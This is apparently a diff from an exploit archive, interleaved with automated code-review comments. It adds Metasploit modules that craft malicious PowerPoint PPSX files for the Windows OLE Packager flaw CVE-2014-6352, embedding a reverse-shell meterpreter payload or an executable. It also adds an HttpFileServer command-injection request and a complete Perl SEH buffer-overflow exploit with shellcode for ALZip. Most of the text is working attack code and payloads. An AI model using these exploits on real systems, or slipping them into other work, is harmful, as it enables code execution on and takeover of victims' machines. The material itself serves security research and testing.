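+OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
+], self.class)
+end
+def exploit
+print_status("Creating '#{datastore['FILENAME']}' file ...")
+payload_packager = create_packager('tabnanny.py', payload.encoded)
+trigger_packager = create_packager("#{rand_text_alpha(4)}.py", rand_text_alpha(4 + rand(10)))
+zip = zip_ppsx(payload_packager, trigger_packager)
+file_create(zip)
+end
+def zip_ppsx(ole_payload, ole_trigger)
+zip_data = {}
+data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4114', 'template')
+Dir["#{data_dir}/**/**"].each do |file|
+unless File.directory?(file)
+zip_data[file.sub(data_dir,'')] = File.read(file)
+end
+end
+# add the otherwise skipped "hidden" file
+file = "#{data_dir}/_rels/.rels"
+zip_data[file.sub(data_dir,'')] = File.read(file)
+# put our own OLE streams
+zip_data['/ppt/embeddings/oleObject1.bin'] = ole_payload
+zip_data['/ppt/embeddings/oleObject2.bin'] = ole_trigger
+# create the ppsx
+ppsx = Rex::Zip::Archive.new
+zip_data.each_pair do |k,v|
+ppsx.add_file(k,v)
+end
+ppsx.pack
+end
+def create_packager(file_name, contents)
+file_info = [2].pack('v')
+file_info << "#{file_name}\x00"
+file_info << "#{file_name}\x00"
+file_info << "\x00\x00"
+extract_info = [3].pack('v')
+extract_info << [file_name.length + 1].pack('V')
+extract_info << "#{file_name}\x00"
+file = [contents.length].pack('V')
+file << contents
+append_info = [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
+append_info << [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
+append_info << [file_name.length].pack('V')
+append_info << Rex::Text.to_unicode(file_name)
+ole_data = file_info + extract_info + file + append_info
+ole_contents = [ole_data.length].pack('V') + ole_data
+ole = create_ole("\x01OLE10Native", ole_contents)
+ole
+end
+def create_ole(stream_name, data)
+ole_tmp = Rex::Quickfile.new('ole')
+stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
+stm = stg.create_stream(stream_name)
+stm << data
+stm.close
+directory = stg.instance_variable_get(:@directory)
+directory.each_entry do |entry|
+if entry.instance_variable_get(:@_ab) == 'Root Entry'
+# 0003000C-0000-0000-c000-000000000046 # Packager
+clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
+entry.instance_variable_set(:@_clsId, clsid)
+end
+end
+# write to disk
+stg.close
+ole_contents = File.read(ole_tmp.path)
+ole_tmp.close
+ole_tmp.unlink
+ole_contents
+end
+end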
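Review bot: `include Msf::Exploit::EXE` is mixed in but nothing in the module builds an executable — the payload is `python/meterpreter/reverse_tcp` source written out as `tabnanny.py` — so the mixin can be dropped. The choice of `tabnanny.py` as the payload file name and of random alphabetic junk as the trigger script carries the whole technique, yet neither is explained; a comment in `exploit` along the lines of `# presumably the interpreter launched on the trigger script picks up the dropped tabnanny.py from its own directory — see the referenced McAfee post` would spare the next reader from reverse-engineering it (the exact mechanism should be confirmed before the comment is committed). `zip_ppsx` reads its template from the `CVE-2014-4114` data directory while the module is for CVE-2014-6352; one line noting the deliberate reuse of the Sandworm template would stop that from being read as a typo. `create_ole` reaches into `Rex::OLE::Storage` via `instance_variable_get(:@directory)` and `instance_variable_set(:@_clsId, clsid)` to stamp the Packager CLSID on the root entry, which will break silently on any rename of those internals; if no public setter exists, say so in a comment next to the CLSID.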

152
platforms/windows/local/35236.rb Executable file

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution",
'Description' => %q{
This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)
allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.
The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms
such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known
to be vulnerable. However, based on our testing, the most reliable setup is on Windows
platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other
setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a
crash due to a failure in the CPackage::CreateTempFileName function.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Haifei Li', # Vulnerability discovery
'sinn3r', # Metasploit module
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-6352'],
['MSB', 'MS14-064'],
['BID', '70690'],
['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous']
],
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}],
],
'Privileged' => false,
'DisclosureDate' => "Oct 21 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx'])
], self.class)
end
def exploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
ole_stream = ole_packager
zip = zip_ppsx(ole_stream)
file_create(zip)
end
def zip_ppsx(ole_stream)
zip_data = {}
data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin')
Dir["#{data_dir}/**/**"].each do |file|
unless File.directory?(file)
zip_data[file.sub(data_dir,'')] = File.read(file)
end
end
# add the otherwise skipped "hidden" file
file = "#{data_dir}/_rels/.rels"
zip_data[file.sub(data_dir,'')] = File.read(file)
# put our own OLE streams
zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream
# create the ppsx
ppsx = Rex::Zip::Archive.new
zip_data.each_pair do |k,v|
ppsx.add_file(k,v)
end
ppsx.pack
end
def ole_packager
payload_name = "#{rand_text_alpha(4)}.exe"
file_info = [2].pack('v')
file_info << "#{payload_name}\x00"
file_info << "#{payload_name}\x00"
file_info << "\x00\x00"
extract_info = [3].pack('v')
extract_info << [payload_name.length + 1].pack('V')
extract_info << "#{payload_name}\x00"
p = generate_payload_exe
file = [p.length].pack('V')
file << p
append_info = [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
append_info << [payload_name.length].pack('V')
append_info << Rex::Text.to_unicode(payload_name)
ole_data = file_info + extract_info + file + append_info
ole_contents = [ole_data.length].pack('V') + ole_data
ole = create_ole("\x01OLE10Native", ole_contents)
ole
end
def create_ole(stream_name, data)
ole_tmp = Rex::Quickfile.new('ole')
stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
stm = stg.create_stream(stream_name)
stm << data
stm.close
directory = stg.instance_variable_get(:@directory)
directory.each_entry do |entry|
if entry.instance_variable_get(:@_ab) == 'Root Entry'
# 0003000C-0000-0000-c000-000000000046 # Packager
clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46")
entry.instance_variable_set(:@_clsId, clsid)
end
end
# write to disk
stg.close
ole_contents = File.read(ole_tmp.path)
ole_tmp.close
ole_tmp.unlink
ole_contents
end
end
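Review bot: In `create_ole`, the Quickfile is only removed on the success path — if `stg.close` or the read-back raises, `ole_tmp.close` / `ole_tmp.unlink` never run and the temporary OLE container stays on disk; those two calls belong in an `ensure` block. The read-back should also be binary-safe, `ole_contents = File.binread(ole_tmp.path)`, since a text-mode `File.read` may translate newline bytes on platforms that do so and corrupt the compound file. The identical `create_ole` in the preceding file section has the same two issues. The `instance_variable_get(:@directory)` / `instance_variable_set(:@_clsId, ...)` calls reach into Rex::OLE private state to stamp the Packager CLSID on the root entry; if Rex::OLE::Storage indeed exposes no public setter for that field, a comment recording it, e.g. `# Rex::OLE offers no public way to set the root entry CLSID, so set it directly`, would tell the next maintainer why the internals are touched.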


@ -1,5 +1,3 @@
Affected software: http://sourceforge.net/projects/hfs/
Version : 2.3x
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
@ -23,3 +21,6 @@ it will not handle null byte so a request to
http://localhost:80/search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injection happen.
## EDB Note: This vulnerability will run the payload multiple times. Make sure to take this into consideration when crafting your payload.

145
platforms/windows/remote/35241.pl Executable file

@ -0,0 +1,145 @@
source: http://www.securityfocus.com/bid/45917/info
ESTsoft ALZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
ESTsoft ALZip 8.12.0.3 is vulnerable; other versions may also be affected.
#
#
#[+]Exploit Title: Exploit Buffer Overflow AlZip(SEH)
#[+]Date: 01\19\2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.altools.com/al/downloads/alzip/ALZip812.exe
#[+]Version: 8.12.0.3
#[+]Tested on: WIN-XP SP3 PORTUGUESE BRAZILIAN
#[+]CVE: N/A
#
#
#
#Note:Exploit for the work you have to run program in DOS
#
#C: \> Exploit.pl exploit.zip
#
#In this case my Exploit Creates the zip file exploit.zip
#In the open ALZip Click "OPEN"pass the mouse over the specially crafted file and
#keeps the mouse on top of the file does not click on it and wait then BOOM APPEARS THE CALC
#
#Watch This Video: http://www.youtube.com/watch?v=PTV_tZinI6w
#
#
# ######### ## ######### ######### ## ###############
# ######## #### ######### ######### ## ## ##
# ## ## ## ## ## ## ## ##
# ## ## ## ## ## ## ## ##
# ## ########## ######## ######## ## ## ##
# ## ## ## ## ## ## ##
# ## ## ## ## ## ## ##
# ######## ## ######## ######### ## ## ##
# ######## ## ######## ######### \/ ###############
#
#
#
#
use strict;
use warnings;
system("cls");
system("color 4f");
sub USAGE
{
print q
{
#############################################
# #
# Exploit Buffer Overflow AlZip(SEH) #
# C4SS!0 G0M3S #
# Louredo_@hotmail.com #
# Site http://www.invasao.com.br #
# #
#############################################
[+]Exploit: Exploit Buffer Overflow AlZip(SEH)
[+]Date: 01\\19\\2010
[+]Auhtor: C4SS!0 G0M3S
[+]Home: http://www.invasao.com.br
[+]E-mail: Louredo_@hotmail.com
[+]Version: 8.12.0.3
[+]Impact: Critical
Note:
Look Comments Above for More Information as the Exploit Works
};
}
if($#ARGV!=0)
{
USAGE;
print "[-]Usage: $0 <File_Name>\n";
print "[-]Exemple: $0 Exploit.zip\n";
exit(0);
}
my $sploitfile=$ARGV[0];
my $ldf_header = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $cdf_header = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
my $eofcdf_header = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
USAGE;
print "[*]Identifying the Length Shellcode\n";
sleep(1);
my $shellcode =
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .#Shellcode WINEXEC CALC
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $payload = "A" x 1060;
$payload .= "\xeb\x08\x90\x90";
$payload .= pack(&#039;V&#039;,0x61309258);
$payload .= "\x90" x 10;
$payload .= $shellcode;
print "[*]The length Shellcode:".length($shellcode)."\n";
sleep(1);
$payload .= "\x42" x (4064 - length($payload));
$payload=$payload.".txt";
my $evilzip = $ldf_header.$payload.
$cdf_header.$payload.
$eofcdf_header;
print "[*]Creating the File $ARGV[0]\n";
sleep(1);
open(FILE,">$sploitfile") or die("ERROR:$!");
print FILE $evilzip;
close(FILE);
print "[*]The File $ARGV[0] was Successfully Created\n";
sleep(1);